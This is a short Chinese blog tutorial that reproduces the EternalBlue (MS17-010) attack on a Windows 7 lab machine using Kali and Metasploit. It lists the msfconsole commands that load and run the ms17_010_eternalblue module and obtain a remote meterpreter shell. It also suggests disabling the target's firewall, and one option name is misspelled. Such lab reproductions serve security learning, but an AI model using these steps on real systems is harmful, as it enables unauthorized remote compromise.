当前位置: 首页 > news >正文

永恒之蓝漏洞利用复现

准备阶段:
1.系统:kali,win7
2.使用工具:metasploit,msfconsole
3.知道攻击机(一般是kali)和目标机(win7)的ip地址

操作:
1.打开kali终端,切换到root权限
2.初始化metasploit,输入 msfdb init
3.启动msfconsole

msf使用法则:
使用模块 -> 配置模块必选项 -> 运行模块

metasploit攻击永恒之蓝全流程:
开始之前一般会先ping一下目标机,如果连不上请把目标机的防火墙关了。
1.查找永恒之蓝模块 search ms17_010
2.使用模块 use exploit/windows/smb/ms17_010_eternalblue
3.查看必选项 show options
4.设置必选项 set RHOSTS 目标机ip
set LHOSTS 攻击机ip
5.run

完成攻击后,会进入meterpreter命令行,输入shell,就进入了目标机的命令界面,可以想干嘛就干嘛了。


http://www.mrgr.cn/news/58575.html

相关文章:

  • 分布式ID多种生成方式
  • 利用java visualvm 分析内存溢出oom
  • 2024源鲁杯CTF网络安全技能大赛题解-Round1
  • 【python】OpenCV—Sort the Point Set from Top Left to Bottom Right
  • 中职/高职院校如何利用上进双创工作室来应对世界职业院校技能大赛带来的规则变化
  • 由于导出的数据名字中带有/,导致Matlab打不开,怎么办?
  • Oracle故障诊断(一线DBA必备技能)之ADRCI(一)
  • 大数据新视界 -- 大数据大厂之大数据与虚拟现实的深度融合之旅
  • Centos如何卸载docker
  • 论文学习 | 《电动汽车锂离子电池健康状态估计及寿命预测方法研究》
  • 面向对象进阶(下)(JAVA笔记第二十二期)
  • 海外著名新闻门户媒体软文发稿之华盛顿独立报-大舍传媒
  • Ubuntu 安装php7.3 nginx mysql
  • 基于PyQT+FaceNet卷积神经网络实现的学生人脸识别考勤系统
  • DuoAttention:高效处理长上下文推理的 AI 框架,让 LLMs 如虎添翼!
  • vi编辑器
  • MySQL查看某个数据库里面每张表的字符集和字符排序集
  • 江协科技STM32学习- P21 ADC模数转换器
  • Isaac Sim Docker 部署并使用过程记录
  • 【数据结构和算法】二、python中的常用数据结构(数组、链表、堆栈、递归、二叉树、哈夫曼树等数据结构的基本原理讲解与实战演练)
  • 尼日利亚CRIA解析
  • c++实现boost搜索引擎功能扩展 介绍+代码(日志,处理暂停词,增加数据源,引入广告竞价,增加用户管理,连接mysql)
  • Nestjs请求处理顺序
  • 【信息系统管理工程师】与【信息系统项目管理师】傻傻分不清楚?一文说清楚
  • 谷歌开发者账号,为什么新号老是因为高风险被封?
  • 如何将原本打开Edge呈现出的360浏览器,更换成原本的Edge页面或者百度等其他页面